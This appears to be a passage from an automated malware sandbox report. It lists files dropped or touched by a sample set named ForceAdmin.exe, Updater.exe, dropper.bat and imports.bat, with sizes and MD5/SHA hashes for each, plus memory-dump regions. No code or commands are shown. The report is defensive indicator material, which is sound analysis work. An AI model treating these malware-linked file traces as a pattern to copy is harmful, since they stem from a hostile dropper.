C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
f45ae36374886b65268f960516ee8ab7

SHA1
85ba23d2852a1612b7c18602663fb484551df588

SHA256
cbf7b6530bc127d5e2c66ac9316b75c0bf32e98ae5dd7a1c4cafdc9af5fbf25a

SHA512
f69f0315428555f6d920ce36699708efcefd09c63eabffa8f9f6a1ad053c1ccf522116c9fc1d50665b4aaf951df5222f1455b283885169906e96eab5acd816e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
9bed2795d07e56c0109bcb17733af363

SHA1
3a709e66621c17b2f28e8c12009c1a5d9bd57af7

SHA256
8c999c624117f5c7e619aeec09afc34ae4fdabd734945793f7c97fb219df70cf

SHA512
e4143397d22691fecc8a3e0ed36e97b5b96592775a0c5941100e4d58851bc12656e13cc92532ca468cece904371b21e5a95333e2d35fade2d859eaf83769c4bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES42F1.tmp

Filesize
1KB

MD5
ebca9b8f9679548f3ebea4362674ed80

SHA1
ae0fdd9a70a4499dbc9b96ed1f5af0470ae4eaf4

SHA256
2e3e45f58048d5988f85e81e596d5124ffd5e52214555dcc61fe18fa24903065

SHA512
46f41f5cfe48bbbb634bb5125056a57f6309cefe92304a0b7889a23e60a429c1922f6230879859ecef783d586e65d3314d4a218225f95588d22558ef369d2c53

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5mrtbc0.tdm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp310A.tmp.bat

Filesize
137B

MD5
b1ee0332eaa146c0eda42fed435279fe

SHA1
a38f8226fe20db5308c9ad32593501484451d1d9

SHA256
bcf1c7e8efcf4ad18317f0b549efb3eaf893fdfa4aa0f40d8441047600824541

SHA512
4196633fe203eb3ee46ef5f3678431d1a376d9a9040c1a4c7baa5f9beff6fdd811e86d080edac89e316ac656f99d3fd4d912bbb319432d425c42168ebe00426c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp42FB.tmp.bat

Filesize
151B

MD5
84ba6ef271da11129f59946d31b1f108

SHA1
e56793547e3e4f4f66edee163b32713eb969cbbf

SHA256
40f14a83c3da60ab5084a1225f978322fe56c35814348f123d55f4560db795c8

SHA512
1c0cabf0ceabcfa72cce48b8470de5be15bd736f2490a1d3edafd20d72fd863633ed7d1c37edd42bf5573aa42e1a18366d849e37e88fd8d5eb01f23400f0f951

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8846.tmp.bat

Filesize
136B

MD5
f5c13c5207ede8b6493f3601e1adbed3

SHA1
68c842c159f2ae3dc7e63f2cf650d7483f609b68

SHA256
95a92ccfcb8f1b473e5b0cdbde65ecc58d5ad6e7e2bde8c5784684bd34c754e9

SHA512
bc024f410732529f731b9144b7d3cc3dbee983615e6bc151780a1eec9efd2456801c5b8d7e6e78856ac723c56c3dc3b135d9ea43dc148fd99ec11ca4c5ae2e4b

Download Submit
C:\Users\Admin\Desktop\sample\ForceAdmin.exe

Filesize
309KB

MD5
14938582caf4bbc6b2af665ca31fd60c

SHA1
289a2d81be847f58051891bf58b9699acd124874

SHA256
75eacbca3054af7502185379ce007e6dafb968dee4a29a0b17b2890aa12ebdc7

SHA512
3e40a71ab736e0156c2d1f18abb3b3b54314df0985041dd2a900e753b154c083340121a4c2a3d8820f73f608a21958dff71c73379509e08afecc2ac9388f5414

Download Submit
C:\Users\Admin\Desktop\sample\Updater.exe

Filesize
4KB

MD5
9689836feacd5fab576a3039bf855d03

SHA1
b953942eb217c2a9db61da04a94b658b74db0b83

SHA256
69807b3a0a4615245cbbae1f65a2c808f35a150f2cda882d9a9be93a9c67bf7a

SHA512
c0f0ef8300ce00f35d5c7011b0a2b19399f3d43e27b3241bac3f497ee876f5f9684389b83fd4174d2f961e3728facb812115cf2f3466d6bffbb4e4f7f0a76a71

Download Submit
C:\Users\Admin\Desktop\sample\dropper.bat

Filesize
307B

MD5
0e72f454c5612b3ac7a68e8bc9a7ad52

SHA1
2fe0f76e1d6f8e41a234de376ed8c1d7e50395f7

SHA256
da1dfc67cc70ab3ddbd60b1ebc4b153872e380e6542915e9c03ad5eb0f444ea8

SHA512
861b2df2417b48769e109c9e5415ebe7d03563e3b3b38b2fff003a4ac69e0b9615df00a7ed43bc4adbe0dff8176573d4fcc8288b6ec7886f849e855db8cf49f6

Download Submit
C:\Users\Admin\Desktop\sample\imports.bat

Filesize
3.5MB

MD5
708f7b01c986403d75f4efc60b9b2dbb

SHA1
09e8bc4a715f7399df9e1b0f5c6a83144c64be23

SHA256
de25f737f64b4fdd7a148250fe09aa4bb4b7210566be9157da1ae74f641bf6c8

SHA512
480d53da4dfd1059a0ccb964ca78472cf0525e35903d50ef7c70368d589e5d162e443d154212b835a59d25bcfa2d2e5a8ec2d17b55f6bf1d2da97ef44f292838

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5jpcznnv\5jpcznnv.0.cs

Filesize
336B

MD5
99d0a217d8eaf61fedbd964a70f4951c

SHA1
df114942384e3b807b15bbe2d6425a00f3c57369

SHA256
d0aeb1b3c6da035433cd2dd44a106b79d51b4bcefca436ffd45aa3e5c423e7c9

SHA512
a6485a1a8ba5549174e8ea0e4b2cbed4c66a9ca3a1cf358d8aac8ef31676b051456cf5054bab2eb80a397d863ea78a5a6f40db4bb267fd3ab94936da1826d3da

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5jpcznnv\5jpcznnv.cmdline

Filesize
178B

MD5
25818ac015d2d65a20268ff12107c042

SHA1
71686bd657de120f5095b150b10fc5b9aec83362

SHA256
16ba43edd751f25e89e0cdc3a75370859e6f5d10c954b000f03860e4983f74d1

SHA512
1772281d79acd64973f116b949136278d95e364c9ade0e780b4b0a5f4e17d3f064caf41e32e0ad1c5d1d4a36386d30b4b4e92fb97ed328eb5cd4fbb288d9bebd

Download Submit
\??\c:\Users\Admin\Desktop\sample\CSCF6E0CA01C14B4FCCBC45432B8BC715C0.TMP

Filesize
1KB

MD5
5b6e2e5fb92ad30827ad194a20d7152e

SHA1
e6574744a886d0edf3fadce5aa86f41b15367b05

SHA256
6b4c3515f30e3e78b27ba947e72cce0a1ae3d9f0cd87c7ccbbfacbbb62d49ff5

SHA512
067fe13c94eada7ea0b7833a441be90a7ea356edd74356529b109d28c6e7f42034c3a61e13287d14d8b7ef69846b3c7d5573c70d7f19f7fd5a86f296109a638a

Download Submit
memory/1628-276-0x000000001C6B0000-0x000000001C760000-memory.dmp

Filesize
704KB

Download
memory/1628-277-0x000000001D3F0000-0x000000001D918000-memory.dmp

Filesize
5.2MB

Download
memory/1628-275-0x0000000000AB0000-0x0000000000ABC000-memory.dmp

Filesize
48KB

Download
memory/1628-60-0x00000000002C0000-0x00000000002D6000-memory.dmp

Filesize
88KB

Download
memory/4144-44-0x0000000000210000-0x0000000000222000-memory.dmp

Filesize
72KB

Download
memory/4712-297-0x00000240D9210000-0x00000240D9262000-memory.dmp

Filesize
328KB

Download
memory/4892-6-0x0000026BFE5F0000-0x0000026BFE612000-memory.dmp

Filesize
136KB

Download
memory/4892-20-0x00007FF973B10000-0x00007FF9745D1000-memory.dmp

Filesize
10.8MB

Download
memory/4892-17-0x00007FF973B10000-0x00007FF9745D1000-memory.dmp

Filesize
10.8MB

Download
memory/4892-5-0x00007FF973B13000-0x00007FF973B15000-memory.dmp

Filesize
8KB

Download
memory/4892-16-0x00007FF973B10000-0x00007FF9745D1000-memory.dmp

Filesize
10.8MB

Download